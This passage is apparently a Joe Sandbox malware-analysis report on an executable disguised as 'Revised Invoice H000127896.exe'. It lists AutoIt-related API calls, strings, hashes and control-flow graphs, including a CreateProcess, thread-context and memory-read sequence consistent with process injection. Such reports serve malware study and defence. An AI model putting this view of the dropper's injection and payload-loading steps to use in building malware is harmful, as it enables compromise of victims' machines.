                              • String ID: TaskbarCreated
                              • API String ID: 129472671-2362178303
                              • Opcode ID: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction ID: c871ea33cf18a3cc9178abcaf30b48d6b70312a550ef0fd47f6a389c1f0ea6f4
                              • Opcode Fuzzy Hash: cce8c5a03ea04b09f31441a39b36d20ef7a6309a2ce36e618d98c5e601e7cd17
                              • Instruction Fuzzy Hash: 1E417932B0420497DB28DB68EC85BBE3355E759320F10493FFA11AB6F1C67D9850879E

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2046 4115d7-4115df 2047 4115ee-4115f9 call 4135bb 2046->2047 2050 4115e1-4115ec call 411988 2047->2050 2051 4115fb-4115fc 2047->2051 2050->2047 2054 4115fd-41160e 2050->2054 2055 411610-41163b call 417fc0 call 41130a 2054->2055 2056 41163c-411656 call 4180af call 418105 2054->2056 2055->2056
                              APIs
                              • _malloc.LIBCMT ref: 004115F1
                                • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                                • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                                • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                              • std::exception::exception.LIBCMT ref: 00411626
                              • std::exception::exception.LIBCMT ref: 00411640
                              • __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
                              • String ID: ,*H$4*H$@fI
                              • API String ID: 615853336-1459471987
                              • Opcode ID: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction ID: 1677ae912bb9c86ef767233b76c14da205579da8f33ef274bedc9cd0e4e1b94c
                              • Opcode Fuzzy Hash: 221d40d7984faa14442154e9f969528898a85ced6d82758f7c2d656e85d04d6d
                              • Instruction Fuzzy Hash: C5F0F9716001196BCB24AB56DC01AEE7AA5AB40708F15002FF904951A1CBB98AC2875D

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2065 40a6260-40a630e call 40a3c70 2068 40a6315-40a633b call 40a7170 CreateFileW 2065->2068 2071 40a633d 2068->2071 2072 40a6342-40a6352 2068->2072 2073 40a648d-40a6491 2071->2073 2079 40a6359-40a6373 VirtualAlloc 2072->2079 2080 40a6354 2072->2080 2074 40a64d3-40a64d6 2073->2074 2075 40a6493-40a6497 2073->2075 2081 40a64d9-40a64e0 2074->2081 2077 40a6499-40a649c 2075->2077 2078 40a64a3-40a64a7 2075->2078 2077->2078 2082 40a64a9-40a64b3 2078->2082 2083 40a64b7-40a64bb 2078->2083 2084 40a637a-40a6391 ReadFile 2079->2084 2085 40a6375 2079->2085 2080->2073 2086 40a64e2-40a64ed 2081->2086 2087 40a6535-40a654a 2081->2087 2082->2083 2090 40a64cb 2083->2090 2091 40a64bd-40a64c7 2083->2091 2092 40a6398-40a63d8 VirtualAlloc 2084->2092 2093 40a6393 2084->2093 2085->2073 2094 40a64ef 2086->2094 2095 40a64f1-40a64fd 2086->2095 2088 40a655a-40a6562 2087->2088 2089 40a654c-40a6557 VirtualFree 2087->2089 2089->2088 2090->2074 2091->2090 2098 40a63da 2092->2098 2099 40a63df-40a63fa call 40a73c0 2092->2099 2093->2073 2094->2087 2096 40a64ff-40a650f 2095->2096 2097 40a6511-40a651d 2095->2097 2101 40a6533 2096->2101 2102 40a652a-40a6530 2097->2102 2103 40a651f-40a6528 2097->2103 2098->2073 2105 40a6405-40a640f 2099->2105 2101->2081 2102->2101 2103->2101 2106 40a6442-40a6456 call 40a71d0 2105->2106 2107 40a6411-40a6440 call 40a73c0 2105->2107 2113 40a645a-40a645e 2106->2113 2114 40a6458 2106->2114 2107->2105 2115 40a646a-40a646e 2113->2115 2116 40a6460-40a6464 CloseHandle 2113->2116 2114->2073 2117 40a647e-40a6487 2115->2117 2118 40a6470-40a647b VirtualFree 2115->2118 2116->2115 2117->2068 2117->2073 2118->2117
                              APIs
                              • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 040A6331
                              • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 040A6557
                              Memory Dump Source
                              • Source File: 00000000.00000002.2071448174.00000000040A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040A3000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40a3000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateFileFreeVirtual
                              • String ID:
                              • API String ID: 204039940-0
                              • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                              • Instruction ID: e21d18076d943d11c140941158de8944036f3b49d4f5948d1ab3732ca0243121
                              • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                              • Instruction Fuzzy Hash: 68A10775E00208EBDB14CFE4C898BEEB7B5FF48304F248559E541BB280D776AA51CB55

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2119 4102b0-4102c5 SHGetMalloc 2120 4102cb-4102da SHGetDesktopFolder 2119->2120 2121 425dfd-425e0e call 433244 2119->2121 2122 4102e0-41031a call 412fba 2120->2122 2123 41036b-410379 2120->2123 2131 410360-410368 2122->2131 2132 41031c-410331 SHGetPathFromIDListW 2122->2132 2123->2121 2129 41037f-410384 2123->2129 2131->2123 2133 410351-41035d 2132->2133 2134 410333-41034a call 412fba 2132->2134 2133->2131 2134->2133
                              APIs
                              • SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                              • SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                              • _wcsncpy.LIBCMT ref: 004102ED
                              • SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                              • _wcsncpy.LIBCMT ref: 00410340
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _wcsncpy$DesktopFolderFromListMallocPath
                              • String ID: C:\Users\user\Desktop\Revised Invoice H000127896.exe
                              • API String ID: 3170942423-4269375749
                              • Opcode ID: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction ID: 8627f7bfe00d67ecf541507c27de0d1a6b0c746b93627a891ac6cfe5d1469166
                              • Opcode Fuzzy Hash: bfe3e3032d26ed5990890659b1503a19068975a9e613434ef85ace480ecdfa96
                              • Instruction Fuzzy Hash: 4B219475A00619ABCB14DBA4DC84DEFB37DEF88700F108599F909D7210E674EE45DBA4

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2137 401250-40125c 2138 401262-401293 call 412f40 call 401b80 2137->2138 2139 4012e8-4012ed 2137->2139 2144 4012d1-4012e2 KillTimer SetTimer 2138->2144 2145 401295-4012b5 2138->2145 2144->2139 2146 4012bb-4012bf 2145->2146 2147 4272ec-4272f2 2145->2147 2148 4012c5-4012cb 2146->2148 2149 42733f-427346 2146->2149 2150 4272f4-427315 Shell_NotifyIconW 2147->2150 2151 42731a-42733a Shell_NotifyIconW 2147->2151 2148->2144 2152 427393-4273b4 Shell_NotifyIconW 2148->2152 2153 427348-427369 Shell_NotifyIconW 2149->2153 2154 42736e-42738e Shell_NotifyIconW 2149->2154 2150->2144 2151->2144 2152->2144 2153->2144 2154->2144
                              APIs
                                • Part of subcall function 00401B80: _wcsncpy.LIBCMT ref: 00401C41
                                • Part of subcall function 00401B80: _wcscpy.LIBCMT ref: 00401C5D
                                • Part of subcall function 00401B80: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              • KillTimer.USER32(?,?,?,?,?), ref: 004012D3
                              • SetTimer.USER32(?,?,000002EE,00000000), ref: 004012E2
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 0042730F
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 00427363
                              • Shell_NotifyIconW.SHELL32(?,000003A8), ref: 004273AE
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: IconNotifyShell_$Timer$Kill_wcscpy_wcsncpy
                              • String ID:
                              • API String ID: 3300667738-0
                              • Opcode ID: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction ID: ad6fff92b80ef16b1053521cf30c66606da497e43c90b6e238f917110e524b22
                              • Opcode Fuzzy Hash: 4b14c7d07e087387f8a3c98a8cd4bd71866d27c85158e2001d1b6fa40e2d0dfa
                              • Instruction Fuzzy Hash: AF31EA70604259BFDB16CB24DC55BEAFBBCBB02304F0000EAF58CA3291C7741A95CB9A

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 2155 40e4c0-40e4e5 call 403350 RegOpenKeyExW 2158 427190-4271ae RegQueryValueExW 2155->2158 2159 40e4eb-40e4f0 2155->2159 2160 4271b0-4271f5 call 4115d7 call 43652f RegQueryValueExW 2158->2160 2161 42721a-42722a RegCloseKey 2158->2161 2166 427210-427219 call 436508 2160->2166 2167 4271f7-42720e call 402160 2160->2167 2166->2161 2167->2166
                              APIs
                              • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,?,?,0040E4A1), ref: 0040E4DD
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,0040E4A1,00000000,?,?,?,0040E4A1), ref: 004271A6
                              • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,0040E4A1,?,00000000,?,?,?,?,0040E4A1), ref: 004271ED
                              • RegCloseKey.ADVAPI32(?,?,?,?,0040E4A1), ref: 0042721E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: QueryValue$CloseOpen
                              • String ID: Include$Software\AutoIt v3\AutoIt
                              • API String ID: 1586453840-614718249
                              • Opcode ID: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                              • Instruction ID: d6672e68ffeed78ba434be4ce119fa1e10800d5a5bf196f8e2f41644cb46c1f5
                              • Opcode Fuzzy Hash: 413bff81f872addaca3d9ad162024b649ce289641a3285436bc7eb0a5f7ce606
                              • Instruction Fuzzy Hash: CF21D871780204BBDB14EBF4ED46FAF737CEB54700F10055EB605E7281EAB5AA008768
                              APIs
                              • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 004105A5
                              • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 004105CE
                              • ShowWindow.USER32(?,00000000), ref: 004105E4
                              • ShowWindow.USER32(?,00000000), ref: 004105EE
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Window$CreateShow
                              • String ID: AutoIt v3$edit
                              • API String ID: 1584632944-3779509399
                              • Opcode ID: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction ID: 021b1916d714280a6beb379f8f8b29d81737bdb93309e58067b2166fb7f1837a
                              • Opcode Fuzzy Hash: b28a7d78b19f48c216133de275d8b0452446851dd496b073adb1022152ad6d67
                              • Instruction Fuzzy Hash: 29F01771BE43107BF6B0A764AC43F5A2698A758F65F31083BB700BB5D0E1E4B8408B9C
                              APIs
                                • Part of subcall function 040A5F10: Sleep.KERNELBASE(000001F4), ref: 040A5F21
                              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 040A6159
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2071448174.00000000040A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040A3000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40a3000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CreateFileSleep
                              • String ID: JVWETZ8KJIJYLPKISOLHHW
                              • API String ID: 2694422964-2614229497
                              • Opcode ID: 14a2ba0628731f1787e9991a1ed2de31fae3ef5f1cc8aec860866ee44fb20198
                              • Instruction ID: ee617497fea925e05abffbda10e63f4b5c3ea59db137e332ecc6a8bdc5cb79d0
                              • Opcode Fuzzy Hash: 14a2ba0628731f1787e9991a1ed2de31fae3ef5f1cc8aec860866ee44fb20198
                              • Instruction Fuzzy Hash: 88519570D04248EAEF11DBE4D854BEFBB75AF19304F044598E249BB2C1D7BA1B44CBA6
                              APIs
                              • LoadStringW.USER32(?,00000065,?,0000007F), ref: 0042723B
                                • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                              • _wcsncpy.LIBCMT ref: 00401C41
                              • _wcscpy.LIBCMT ref: 00401C5D
                              • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00401C6F
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: IconLoadNotifyShell_String_memmove_wcscpy_wcslen_wcsncpy
                              • String ID: Line:
                              • API String ID: 1874344091-1585850449
                              • Opcode ID: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction ID: 22c0e507134e40740d6fd31dbafdd21c3b8ff828be9a92102ab360472f74cad7
                              • Opcode Fuzzy Hash: 71d679a4a9352c46b300ee00bac0ebd609a16659c7848ecadc14a4878baa23f7
                              • Instruction Fuzzy Hash: EB31A1715083459BD320EB61DC45BDA77E8BF85318F04093EF588931E1E7B8AA49C75E
                              APIs
                              • RegOpenKeyExW.KERNELBASE(00000004,Control Panel\Mouse,00000000,00000001,00000004,00000004), ref: 0040F267
                              • RegQueryValueExW.KERNELBASE(00000000,?,00000000,00000000,?,?,00000002,00000000), ref: 0040F28E
                              • RegCloseKey.KERNELBASE(?), ref: 0040F2B5
                              • RegCloseKey.ADVAPI32(?), ref: 0040F2C9
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Close$OpenQueryValue
                              • String ID: Control Panel\Mouse
                              • API String ID: 1607946009-824357125
                              • Opcode ID: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction ID: a31ac2e1b7deaa2d1d9e7506379341dce8fcd1dacbe24dc49005ae4a0027d3ba
                              • Opcode Fuzzy Hash: 0a2ddf5dd10fc63f6e19eedc2563a5e53f3783e3c799d68c1c3a3a1866560054
                              • Instruction Fuzzy Hash: 91118C76640108AFCB10CFA8ED459EFB7BCEF59300B1089AAF908C3210E6759A11DBA4
                              APIs
                              • CreateProcessW.KERNELBASE(?,00000000), ref: 040A56CB
                              • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 040A5761
                              • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 040A5783
                              Memory Dump Source
                              • Source File: 00000000.00000002.2071448174.00000000040A3000.00000040.00000020.00020000.00000000.sdmp, Offset: 040A3000, based on PE: false
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_40a3000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: Process$ContextCreateMemoryReadThreadWow64
                              • String ID:
                              • API String ID: 2438371351-0
                              • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                              • Instruction ID: e55201353d41ebc71aad11d6dc3897f504cc7fb3dbe11c8b27eb55042a31ebae
                              • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                              • Instruction Fuzzy Hash: D062E930A146589BEB24CFA4CC50BDEB376FF58304F1091A9D10DFB290E679AE91CB59
                              APIs
                                • Part of subcall function 0040F760: _strcat.LIBCMT ref: 0040F786
                              • _free.LIBCMT ref: 004295A0
                                • Part of subcall function 004033C0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00403451
                                • Part of subcall function 004033C0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00403467
                                • Part of subcall function 004033C0: __wsplitpath.LIBCMT ref: 00403492
                                • Part of subcall function 004033C0: _wcscpy.LIBCMT ref: 004034A7
                                • Part of subcall function 004033C0: _wcscat.LIBCMT ref: 004034BC
                                • Part of subcall function 004033C0: SetCurrentDirectoryW.KERNEL32(?), ref: 004034CC
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_strcat_wcscat_wcscpy
                              • String ID: >>>AUTOIT SCRIPT<<<$C:\Users\user\Desktop\Revised Invoice H000127896.exe
                              • API String ID: 3938964917-2672606141
                              • Opcode ID: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                              • Instruction ID: c8289cc7cde30cfde4dff3f83c8481f20f860a5b07fa540731426c520eca24fb
                              • Opcode Fuzzy Hash: 69d1c1bcaececaf33fe9124615222b37314c09e14b721507f7704bc6f295293c
                              • Instruction Fuzzy Hash: 9A919171A00219ABCF04EFA5D8819EE7774BF48314F50452EF915B7391D778EA06CBA8
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: _memmove
                              • String ID: Error:
                              • API String ID: 4104443479-232661952
                              • Opcode ID: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                              • Instruction ID: 2c658176ab693071ca67d4d31bd2fe4acf4d59654e7b744331f3a235cb1e2e29
                              • Opcode Fuzzy Hash: 20a21836adb2195423de36251fb93945767d574b7418eb2d4267c7510a98c7d8
                              • Instruction Fuzzy Hash: 0D3191716006059FC324DF29C881AA7B3E6EF84314B24853FE95AC7791EB79E941CBD8
                              APIs
                              • GetOpenFileNameW.COMDLG32(?), ref: 0042961B
                                • Part of subcall function 00410120: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Revised Invoice H000127896.exe,0040F545,C:\Users\user\Desktop\Revised Invoice H000127896.exe,004A90E8,C:\Users\user\Desktop\Revised Invoice H000127896.exe,?,0040F545), ref: 0041013C
                                • Part of subcall function 004102B0: SHGetMalloc.SHELL32(0040F54C), ref: 004102BD
                                • Part of subcall function 004102B0: SHGetDesktopFolder.SHELL32(?,004A90E8), ref: 004102D2
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 004102ED
                                • Part of subcall function 004102B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410327
                                • Part of subcall function 004102B0: _wcsncpy.LIBCMT ref: 00410340
                                • Part of subcall function 00410190: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 004101AB
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000000.00000002.2070494410.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070561215.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070580961.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070597480.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070614782.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2070651462.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_400000_Revised Invoice H000127896.jbxd
                              Similarity
                              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                              • String ID: X$pWH
                              • API String ID: 85490731-941433119
                              • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                              • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                              • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                              APIs
                              • _wcslen.LIBCMT ref: 00401B11
                                • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                              • _memmove.LIBCMT ref: 00401B57
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2070512260.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
